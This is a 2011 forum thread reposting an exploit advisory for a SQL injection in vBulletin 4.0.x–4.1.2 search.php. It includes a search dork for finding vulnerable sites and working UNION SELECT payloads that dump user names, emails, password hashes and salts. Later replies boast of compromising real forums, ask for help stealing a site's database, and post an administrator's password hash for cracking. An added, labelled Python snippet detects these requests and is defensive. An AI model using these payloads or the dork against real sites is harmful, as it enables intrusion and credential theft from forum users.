Nytro Posted May 23, 2011

vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability

====================================================================
# vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability
====================================================================
# PhilKer - PinoyHack - RootCON - GreyHat Hackers - Security Analyst
====================================================================
#[+] Discovered By : D4rkB1t
#[+] Site : NaN
#[+] support e-mail : d4rkb1t@live.com

Product: http://www.vbulletin.com
Version: 4.0.x
Dork : inurl:"search.php?search_type=1"

--------------------------
# ~Vulnerable Codes~ #
--------------------------
/vb/search/searchtools.php - line 715;
/packages/vbforum/search/type/socialgroup.php - line 201:203;

--------------------------
# ~Exploit~ #
--------------------------
POST data on "Search Multiple Content Types" => "groups"

&cat[0]=1) UNION SELECT database()#
&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#

More info: http://j0hnx3r.org/?p=818

--------------------------
# ~Advice~ #
--------------------------
Vendor already released a patch on vb#4.1.3.
UPDATE NOW!

====================================================================
# 1337day.com [2011-5-21]
====================================================================

Source: vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability
Info: vBulletin® 4.x SQL Injection Vulnerability « J0hn.X3r

It has been public (thanks "d") for some time, but I see that it is now showing up on exploit-db as well.

Video demonstration by TinK:
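Added example, not part of the original post or of vBulletin's own code: a defender-side check for the request shape the advisory describes, flagging POSTs to search.php in which any `cat[...]` field (not only `cat[0]`) carries something other than a plain integer. It assumes category ids are short decimal integers and that request bodies are available from a WAF or reverse-proxy log; the function names and sample requests are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Assumption: legitimate cat[...] values are short decimal category ids.
CAT_KEY = re.compile(r"cat\[[0-9]*\]")
CAT_VALUE = re.compile(r"[0-9]{1,10}")


def bad_cat_params(body):
    """Return decoded (key, value) pairs for cat[...] fields that are not integers."""
    pairs = parse_qsl(body)  # URL-decodes keys and values; blank values are dropped
    return [(k, v) for k, v in pairs
            if CAT_KEY.fullmatch(k) and not CAT_VALUE.fullmatch(v)]


def scan(requests):
    """Flag POSTs to search.php that carry a non-integer cat[...] value.

    `requests` is an iterable of (client, method, url, body) tuples, for
    example parsed from a proxy log that records request bodies.
    """
    findings = []
    for client, method, url, body in requests:
        if method.upper() != "POST":
            continue
        if not urlsplit(url).path.lower().endswith("/search.php"):
            continue
        for key, value in bad_cat_params(body):
            findings.append({"client": client, "param": key, "value": value})
    return findings


# Constructed sample traffic (documentation addresses, not real log data).
SAMPLE = [
    ("192.0.2.10", "POST", "/search.php?search_type=1",
     "search_type=1&query=linux&cat%5B0%5D=1&cat%5B%5D=12"),
    ("198.51.100.7", "POST", "/forum/search.php?search_type=1",
     "query=x&cat%5B0%5D=1%29+UNION+SELECT+database%28%29%23"),
    ("192.0.2.10", "GET", "/search.php?search_type=1", ""),
    ("203.0.113.5", "POST", "/other.php", "cat%5B0%5D=abc"),
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

The same integer allow-list applied server-side before the value reaches the query is the input-validation counterpart of this check; the durable fix remains the vendor patch named in the advisory (4.1.3).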

trxtxx Posted May 23, 2011
Man, these guys can't help trying to get famous; they ruined a perfectly good exploit. I've never understood these people who want to publish everything, and in the vast majority of cases it isn't even theirs.

Paul4games Posted May 24, 2011
I don't really think this guy found the exploit; I read about this vulnerability a little over a month ago on his blog: vBulletin® 4.x SQL Injection Vulnerability « J0hn.X3r

Nytro Posted May 24, 2011 Author
Yes, he's the one I know it from too, and I've known about that post for quite a while. Maybe it's some failed plagiarist, or maybe it's the same person...

Guest Mosad Posted May 24, 2011
From what I've seen, in a quote it says "More info: http://j0hnx3r.org/?p=818".

xpaulx Posted May 25, 2011
Here's a short demonstration I made on alphazone.ro a month ago: Alphazone Pwned on Vimeo
@paul4games: no, he's not the one who found the vulnerability. The guy who posted it on 1337day and exploit-db is a skid from hackforums named majidemo.
Edited May 25, 2011 by xpaulx

Stealth2 Posted May 25, 2011
> Here's a short demonstration I made on alphazone.ro a month ago: Alphazone Pwned on Vimeo
I made one too a month and a half ago, in which I showed how it can be exploited.

mah_one Posted May 31, 2011
Why does it give a database error?..... because I don't understand.......
Picz.ro - IMAGE HOSTING

Bebee Posted May 31, 2011
> Why does it give a database error?..... because I don't understand.......
> Picz.ro - IMAGE HOSTING
There are some nulled versions that you can't exploit.

ZyreXX Posted June 1, 2011
Does anyone know how I can grab a database or get into FTP on a forum? It has vBulletin 4.1.2, please.

marcus21 Posted June 2, 2011
I've already managed it on two... but the problem is the encrypted password :(

ZyreXX Posted June 2, 2011
Guys, I can't make out anything in the video, the text is too small!!!

poq Posted June 2, 2011
Go full screen + 720p. I hope that helps. If you've already tried that, it's probably "on your end".
Edited June 2, 2011 by poq

ZyreXX Posted June 2, 2011
Aha, but I don't understand :(, can someone help me grab the database from a forum?

marcus21 Posted June 2, 2011
You can't take the database just like that, only after you get hold of the admin's username and password, and only then can you steal it.
edit: can anyone manage to find the password?
Leonight : d4644b1f0c83a6686f47cf67215c4fa6
Edited June 2, 2011 by marcus21

ZyreXX Posted June 2, 2011
marcus, please give me your ID, or you add darky_pglarea, please

marcus21 Posted June 3, 2011
What don't you understand from the video? It explains it very well.

VADEЯR Posted June 5, 2011
How can I find the password from the hash if I don't have the salt?

negrutidaniel Posted June 7, 2011
smart laggers use script for auto pown them